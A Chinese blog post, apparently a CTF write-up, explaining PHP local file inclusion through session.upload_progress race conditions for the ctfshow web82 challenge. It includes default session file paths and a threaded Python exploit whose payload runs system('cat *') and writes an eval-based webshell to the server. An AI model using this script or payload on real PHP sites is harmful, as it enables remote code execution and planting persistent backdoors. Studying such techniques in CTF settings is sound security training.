利用session.upload_progress进行文件包含

最新推荐文章于 2024-05-17 09:17:42 发布
最新推荐文章于 2024-05-17 09:17:42 发布
阅读量4k 收藏 9
点赞数 5
分类专栏: # ctf知识点总结
https://blog.csdn.net/qq_44657899
本文链接:https://blog.csdn.net/qq_44657899/article/details/109281343
版权

前言

又一种新的文件包含利用方法,记录一下复现过程。

学习自:LFI 绕过 Session 包含限制 Getshell
利用session.upload_progress进行文件包含和反序列化渗透

文章目录

kali本地复现漏洞

所有配置都为默认配置

大概原理:利用session.upload_progress上传一个临时文件,该文件里面有我们上传的恶意代码,然后包含它,从而执行里面的代码。因为该文件内容清空很快,所以需要不停的上传和包含,在清空之前包含该文件。

kali的html目录下写一个1.php
在这里插入图片描述然后不停发包
在这里插入图片描述可以看到目录下已经有了该临时文件,该临时文件因为默认配置session.upload_progress.cleanup = on导致文件上传后,session文件内容立即清空,
在这里插入图片描述

一直cat,终于在没清空的时候cat到了,内容如下:
在这里插入图片描述

可以看到里面有我们上传的恶意代码,如果这时候我们用1.php包含这个临时文件,就可以执行里面的恶意代码了。
在这里插入图片描述

利用burp解题

例:ctfshow-web入门82

 <?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 11:25:09
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 19:34:45
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/
if(isset($_GET['file'])){
    $file = $_GET['file'];
    $file = str_replace("php", "???", $file);
    $file = str_replace("data", "???", $file);
    $file = str_replace(":", "???", $file);
    $file = str_replace(".", "???", $file);
    include($file);
}else{
    highlight_file(__FILE__);
}

过滤了data和php,之前那些协议都用不了,尝试该方法。

利用session.upload_progress上传文件

在这里插入图片描述
这里cookie里PHPSESSID的值决定了我们上传临时文件名,payload可以如下设置
在这里插入图片描述
然后在尝试包含我们上传的文件,文件名默认为sess_再加上我们传的PHPSESSID值,比如我们这里为Cookie: PHPSESSID=ctf所以文件名为sess_ctf,默认路径有下面几个:

默认路径

/var/lib/php/sess_PHPSESSID
/var/lib/php/sessions/sess_PHPSESSID
/tmp/sess_PHPSESSID
/tmp/sessions/sess_PHPSESSID

这道题为/tmp/sess_ctf,不知道可以一个一个测试,再一直发包含/tmp/sess_ctf的包。
在这里插入图片描述

可以看到已经成功包含临时文件,并读取到了flag

在这里插入图片描述

利用python脚本解题

也直接用前面文章里的脚本:

import io
import sys
import requests
import threading

sessid = 'Qftm'

def POST(session):
    while True:
        f = io.BytesIO(b'a' * 1024 * 50)
        session.post(
            'http://250307c3-cf87-4811-987f-20189fa2442c.chall.ctf.show/',
            data={"PHP_SESSION_UPLOAD_PROGRESS":"<?php system('cat *');fputs(fopen('shell.php','w'),'<?php @eval($_POST[mtfQ])?>');?>"},
            files={"file":('q.txt', f)},
            cookies={'PHPSESSID':sessid}
        )

def READ(session):
    while True:
        response = session.get(f'http://250307c3-cf87-4811-987f-20189fa2442c.chall.ctf.show/?file=/tmp/sess_{sessid}')
        if 'flag' not in response.text:
            print('[+++]retry')
        else:
            print(response.text)
            sys.exit(0)


with requests.session() as session:
    t1 = threading.Thread(target=POST, args=(session, ))
    t1.daemon = True
    t1.start()

    READ(session)

改下网址和要执行的shell即可
在这里插入图片描述

天问_Herbert555
关注
  • 5
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
PHP基于session.upload_progress 实现文件上传进度显示功能详解
01-02
本文实例讲述了PHP基于session.upload_progress 实现文件上传进度显示功能。分享给大家供大家参考,具体如下: 介绍 session.upload_progress 是PHP5.4的新特征。 当 session.upload_progress.enabled INI 选项开启时,PHP 能够在每一个文件上传时监测上传进度。 这个信息对上传请求自身并没有什么帮助,但在文件上传时应用可以发送一个POST请求到终端(例如通过XHR)来检查这个状态。 当一个上传在处理中,同时POST一个与INI中设置的session.upload_progress.name同名变量时,上传进度可
session.upload_progress进行文件包含和反序列化学习
snowlyzz的博客
09-07 459
利用session.upload_progress进行文件包含
深入浅出带你学习利用session.upload_progress进行文件包含/深入浅出带你学习利用session.upload_progress进行文件包含_新手渗透自学
最新发布
程序员六七的博客
05-17 298
本文正在参加「金石计划 . 瓜分6万现金大奖」前言该思路是很久之前在CTF比赛中学习到的,可以简单理解为利用.来进行文件竞争从而达到上传文件进行文件包含或者命令执行的目的
session.upload_progress文件包含
Aiwin的博客
05-29 808
session.upload_progress文件包含
用PHP Session和Javascript实现文件上传进度条
huank_dmy的博客
07-13 548
用PHP Session和Javascript实现文件上传进度条Web应用中常需要提供文件上传的功能。典型的场景包括用户头像上传、相册图片上传等。当需要上传的文件比较大的时候,提供一个显示上传进度的进度条就很有必要了。在PHP 5.4以前,实现这样的进度条并不容易,主要有三种方法: 1、使用Flash, Java, ActiveX 2、使用PHP的APC扩展 3、使用HTML5的File AP
PHP文件上传进度条插件js版 不需要修改php的session.upload-progress或安装额外的php模块等
08-16
一,插件名 UploadiFive 二,apache或iis等服务器.需要修改文件上传大小时间等限制 三,文件默认上传到网站根目录的/Uploads/exe_file/目录中 四,默认不修改文件名,所以,上传的文件,不得有空格,中文斜线等非法字符
PHP使用Session实现上传进度功能详解
10-16
- `session.upload_progress.cleanup`:默认设置为1,表示文件上传完成后清理相关的session数据。 - `session.upload_progress.prefix`:定义session中存储上传进度信息的键的前缀。 - `session.upload_progress....
EurekaLog_7.5.0.0_Enterprise
11-15
9)....Added: EMemLeaks._ReserveOutOfMemory to control reserve size of out of memory errors (default is 50 Mb) 10)..Added: "MinLeaksLimitObjs" option (EMemLeaks unit) 11)..Added: Fatal memory problem ...
php通过session实现upload_progress
prape's world!
01-07 1149
在php中,显示上传文件进度有swf,apc,纯javascript等集中方法,而现在比较推荐的是利用php的session(PHP>5.4)实现,这里,我简单的记录一下。 相关资料可以参考php.net/manual/en/session.upload-progress.php,还是相对比较简单的,可以参考www.111cn.net/phper/php-cy/54314.htm这里的讲解,但是
session.upload_progress反序列化学习
..
03-10 1823
Session的配置选项和存储方式 在php.ini中存在四项配置项: session.save_path="" --设置session的存储路径 session.save_handler="" --设定用户自定义存储函数,如果想使用PHP内置会话存储机制之外的可以使用本函数(数据库等方式) session.auto_start boolen --指定会话模块是否在请求开始时启动一个会话,默认为0不启动 session.serialize_handler string --定义用来...
-------已搬运------session.upload_progress。伪造session 反序列化 + 文件包含,,临时文件包含 ++ PHP7 的 segment fault
Zero_Adam的博客
05-01 597
目录:1. 在session反序列化,PHP解析器的考点中使用。2. 进行文件包含:!!!我发现了一个新的方法: 1. 在session反序列化,PHP解析器的考点中使用。 PHP反序列化之SEESSION反序列化(二):切入学习点:jarvis OJ PHPINFO. 这个是利用了当session.upload_progress.enabled开启时如果我们上传了一个和session.upload_progress.name同名的变量,也就是名字为PHP_SESSION_UPLOAD_PROGRESS的时
sessionsession.upload_progress再认识
Monica的博客
10-25 1180
结合: WEB82-session文件包含 WEB263-session反序列化 进一步了解sessionsession.upload_progress知识 1、cleanup 只会清除session文件内容,不会清楚session文件 2、当页面使用ini_set修改php.ini文件的内容时,phpinfo()里面的local value内容也会修改 我们在脚本使用了ini_set('session.serialize_handler', 'php'); 而php.ini中.
PHP5.4新特性之上传进度支持Upload progress
weixin_33767813的博客
08-23 112
在PHP5.4版本当中给我们提供了好用的特性,上传进度的支持,我们可以配合Ajax动态获取SESSION当中的上传进度: 在使用这一特性之前,需要现在php.ini文件当中进行相应的设置:     1 2 3 4 5 6 session.upload_progress.enabled[ = On] :                 ...
ctl文件去空格_CTF从入门到提升(十三)文件包含session及例题详解
weixin_39964869的博客
12-20 269
具体场景——session我们可以查一下手册,看看这个参数是默认开启:举例子通过上传一个orange作为key传一个值传给这个变量,放到file函数中,再去比对file函数读取结果文件中的第一行0前面六个字符串是否匹配,如果是orange就会作为包含,否则就会显示源代码。这道题的难点在于包含一个文件要控制里面的内容,file函数的作用是把一个整一个文件读到一个数据中去,filename要读取文件名...
文件包含骚姿势——利用session.upload_progress进行文件包含
weixin_46330722的博客
12-25 1961
利用session.upload_progress进行文件包含
php 上传图片 进度,php+uploadprogress实现上传进度功能
weixin_39966740的博客
03-10 142
文件上传进度反馈, 这个需求在当前是越来越普遍, 比如大附件邮件. 在PHP5.4以前, 我们可以通过APC提供的功能来实现. 或者使用PECL扩展uploadprogress来实现.虽然说, 它们能很好的解决现在的问题, 但是也有很明显的不足:1. 他们都需要额外安装(我们并没有打算把APC加入PHP5.4)2. 它们都使用本地机制来存储这些信息, APC使用共享内存, 而uploadprogr...
PHP文件上传进度条基于Session与Javascript实现
weixin_33928137的博客
08-28 98
PHP文件上传进度条基于Session与Javascript实现如果你使用的是php5.4之前的就只能通过ajax,iframe或一些其它办法来实现,如果你使用的是php5.4我们可以使用session.upload_progress 来快速结合js实现文件上传进度条.下面我们就详细介绍一下 PHP 5.4 的这个 session.upload_progress 新特性.原理...
php session.save_path
06-11
php session.save_path 是用来设置 PHP 应用程序存储 Session 数据的路径。Session 是一种在 Web 应用程序中用来存储用户数据的机制,PHP 使用一个名为 "Session ID" 的标识符来跟踪用户的 Session 数据。当用户打开一个页面时,PHP 会自动创建一个 Session ID,并将其存储在客户端的 Cookie 中。当用户访问其他页面时,PHP 会通过 Session ID 来检索该用户的 Session 数据。如果未设置 session.save_path,则 PHP 将使用默认路径来存储 Session 数据。可以通过在 php.ini 文件中设置 session.save_path 来更改默认路径。例如,可以将 session.save_path 设置为 "/tmp",以将 Session 数据存储在 /tmp 目录中。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值